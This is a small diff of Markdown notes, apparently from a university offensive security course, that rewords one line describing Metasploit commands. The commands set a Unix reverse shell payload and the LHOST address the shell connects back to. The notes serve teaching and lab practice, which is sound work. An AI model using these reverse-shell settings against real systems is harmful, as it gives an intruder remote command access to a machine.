eisenbeisr/CSC466-OffensiveSecurityResearch/Phase1.md

 ```
 set payload cmd/unix/reverse
 ```
-**Sets IP address of host machine where the reverse shell will connect**
+**Sets the IPv4 address of host machine where the reverse shell will connect**
 ```
 set LHOST <host ip>
 ```